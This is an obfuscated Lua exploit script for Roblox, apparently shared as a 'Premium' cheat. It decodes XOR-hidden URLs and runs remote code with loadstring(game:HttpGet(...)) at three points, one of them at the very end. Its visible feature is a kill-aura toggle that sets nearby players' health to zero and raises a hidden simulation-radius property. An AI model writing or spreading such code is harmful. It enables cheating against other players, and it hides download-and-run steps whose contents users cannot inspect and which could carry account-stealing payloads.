--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v15,v16) local v17={};for v21=1, #v15 do v6(v17,v0(v4(v1(v2(v15,v21,v21 + 1 )),v1(v2(v16,1 + (v21% #v16) ,1 + (v21% #v16) + 1 )))%256 ));end return v5(v17);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\240\45\231\181\207\48\214\204\216\116\169\176\193\26\217\199\221\106\244\190\193\13\158\203\222\36\226\168\136\19\208\202\213\106\228\183\198\29\218\207\210\54\242\190\195","\126\177\163\187\69\134\219\167")))();local v8=loadstring(game:HttpGet(v7("\43\217\62\213\239\121\130\101\215\253\52\131\45\204\232\43\216\40\208\239\38\223\41\202\242\55\200\36\209\178\32\194\39\138\216\54\212\122\151\172\113\159\122\149\171\108\233\35\214\255\44\223\46\136\208\42\207\101\200\253\42\195\101\225\245\48\206\37\215\248\102\159\122\233\245\33\136\120\149\207\44\216\56\198\249\109\193\63\196\178\55\213\62","\156\67\173\74\165")))();local v9=v8:Window("[KhĂ¡nh Ngá»c] "   .. " " );local v10=game:GetService(v7("\4\187\72\15\185\52\85","\38\84\215\41\118\220\70")).LocalPlayer.Name;v8:Notification("Premium Stars â­ Share",v7("\120\19\46\30\241\17\86","\158\48\118\66\114")   .. "â­"   .. v10   .. v7("\229\100\80\118\51\229\187\235\100\80\118\51\229\187\235\100\80\118\51\229\187\235\100\80\118\51\229\187\235\100\80\118\51\229\187\235\100\80\118\51\229\187\235\100\80\118\51","\155\203\68\112\86\19\197")   .. v7("\6\233\62\253\78\115\246\184\96\210\36\188\98\109\252\184\118\207\51\241\73\109\232\184","\152\38\189\86\156\32\24\133") ,v7("\211\92","\38\156\55\199"));local v11=v9:Server("KhĂ¡nh Ngá»c","");local v12=v11:Channel(v7("\133\124\117\38","\35\200\29\28\72\115\20\154"));local v13=nil;local v14=false;v12:Textbox(v7("\61\182\194\203\140\34\55\28\255\208\202\159\45","\84\121\223\177\191\237\76"),v7("\175\79\217\165","\161\219\54\169\192\90\48\80"),true,function(v18) v13=tonumber(v18);end);v12:Toggle(v7("\98\75\12\41\9\99\21\55\72\2\40\48\68\67\14\42\64\70","\69\41\34\96"),false,function(v19) local v20=0 -0 ;while true do if (v20==(2 -1)) then while v14 do wait(0.1);for v22,v23 in pairs(game:GetService(v7("\30\206\62\131\58\209\45\139\44","\232\73\161\76")):GetDescendants()) do local v24=0;local v25;while true do if (v24==(0 -0)) then v25=v23:FindFirstChildOfClass(v7("\147\204\79\92\16\180\208\70","\126\219\185\34\61"));if (v25 and (v23.Name~=game.Players.LocalPlayer.Name) and (v25.Health>(0 + 0))) then local v28=0;local v29;while true do if (v28==(0 + 0)) then v29=(game.Players.LocalPlayer.Character.HumanoidRootPart.Position-v23.HumanoidRootPart.Position).Magnitude;if (v29<=v13) then pcall(function() repeat local v31=885 -(261 + 624) ;local v32;while true do if (v31==0) then v32=0;while true do if (v32==(0 -0)) then wait();v25.Health=1080 -(1020 + 60) ;v32=1424 -(630 + 793) ;end if (v32==(3 -2)) then v23.HumanoidRootPart.CanCollide=false;sethiddenproperty(game.Players.LocalPlayer,v7("\63\199\83\103\114\118\231\238\3\192\108\115\122\126\230\244","\135\108\174\62\18\30\23\147"),math.huge);break;end end break;end end until (v25.Health<=(0 -0)) or  not v14  end);end break;end end end break;end end end end break;end if (v20==(0 + 0)) then v14=v19;if  not v13 then local v26=0;local v27;while true do if (v26==0) then v27=0;while true do if (v27==(0 -0)) then v8:Notification(v7("\139\194\197\4\11\37\187","\75\220\163\183\106\98"),v7("\33\178\132\56\202\7\250\175\62\202\22\187\133\52\220\66\188\132\37\153\41\179\135\59\153\35\175\153\54","\185\98\218\235\87"),v7("\228\55","\202\171\92\71\134\190"));return;end end break;end end end v20=1;end end end);loadstring(game:HttpGet(v7("\190\253\62\219\11\244\124\136\164\232\61\133\31\167\39\207\163\235\63\216\29\188\48\200\184\253\47\197\12\224\48\200\187\166\14\222\1\254\97\151\228\187\122\155\79\225\37\201\249\228\43\194\22\225\4\194\180\225\37\196\19","\167\214\137\74\171\120\206\83")))();